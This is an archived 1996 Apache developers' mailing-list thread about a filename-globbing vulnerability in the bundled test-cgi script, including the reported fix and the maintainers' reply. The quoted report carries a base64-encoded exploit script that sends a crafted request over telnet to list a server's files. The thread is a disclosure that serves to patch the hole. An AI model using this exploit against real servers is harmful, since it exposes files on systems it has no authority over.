httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Brian Behlendorf <br...@organic.com>
Subject Re: Vulnerability in test-cgi
Date Mon, 09 Dec 1996 03:53:51 GMT

We put a set -f in the script, it'll be a part of 1.2b2.  The other script is a
Perl script which does not have these problems.  Thanks for the note!

	Brian

On Fri, 6 Dec 1996, Rob Hartill wrote:
> M Shariful Anam wrote:
> 
> >  This message is in MIME format.  The first part should be readable text,
> >  while the remaining parts are likely unreadable without MIME-aware tools.
> >  Send mail to mime@docserver.cac.washington.edu for more info.
> >
> >--2144028553-76062616-849877833=:15162
> >Content-Type: TEXT/PLAIN; charset=US-ASCII
> >
> >Hi,
> >
> >The test-cgi that is supplied with apache (1.0.5, 1.1.1 and 1.2b I've
> >checked) has a security hole. It works on Linux, SunOS, Digital UNIX (and
> >should work on all UNIX). Most of the people installs it, without actually
> >understanding the possiblities. 
> >
> >Attached is an exploit script. It is based on the fact that passing a 
> >parameter of "*" to the test-cgi will cause filename globbing and give 
> >that to the remote accessor.
> >
> >Solution is change the following in test-cgi
> >echo CONTENT_TYPE = $CONTENT_TYPE
> >to
> >echo CONTENT_TYPE = "$CONTENT_TYPE"
> >
> >or better yet, put a
> >set -f
> >at the top of the script.
> >
> >Thank you.
> >
> >---
> > M Shariful Anam                              <shuman@kaifnet.com>
> >
> >                Kaifnet Services -- Bangladesh
> >--2144028553-76062616-849877833=:15162
> >Content-Type: TEXT/PLAIN; charset=US-ASCII; name=test-cgi-exploit
> >Content-Transfer-Encoding: BASE64
> >Content-ID: <Pine.LNX.3.91.961206191033.15162B@triton.kaifnet.com>
> >Content-Description: 
> >
> >IyEvYmluL3NoDQoNCiMgY2dpLWJpbi90ZXN0LWNnaSBleHBsb2l0IHRvIGV4
> >cGxvcmUgYW55IHNlcnZlcnMgZGlzaw0KIyBtb2RpZmllZCBieSBTaGFyaWZ1
> >bCBBbmFtIDxzaHVtYW5AdHJpdG9uLmthaWZuZXQuY29tPg0KDQpzZXQgLWYN
> >Cg0KaWYgWyAiJDEiID0gIiIgXTsNCnRoZW4NCiBIT1NUPWxvY2FsaG9zdA0K
> >ZWxzZQ0KIEhPU1Q9JDENCmZpDQoNCmlmIFsgIiQyIiA9ICIiIF07DQp0aGVu
> >DQogTUFTSz0NCmVsc2UNCiBNQVNLPSQyDQpmaQ0KDQooZWNobyBQT1NUIC9j
> >Z2ktYmluL3Rlc3QtY2dpIEhUVFAvMS4wOyBlY2hvIENvbnRlbnQtdHlwZTog
> >JE1BU0tcKiA7IGVjaG8gQ29udGVudC1sZW5ndGg6IDA7IGVjaG87cmVhZCBB
> >U0QpIHwgdGVsbmV0ICRIT1NUIDgwDQo=
> >--2144028553-76062616-849877833=:15162--
> >
> 
> 
> -- 
> Rob Hartill.       Internet Movie Database Ltd.    http://www.imdb.com/  
> 

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
brian@organic.com  www.apache.org  hyperreal.com  http://www.organic.com/JOBS


Mime
View raw message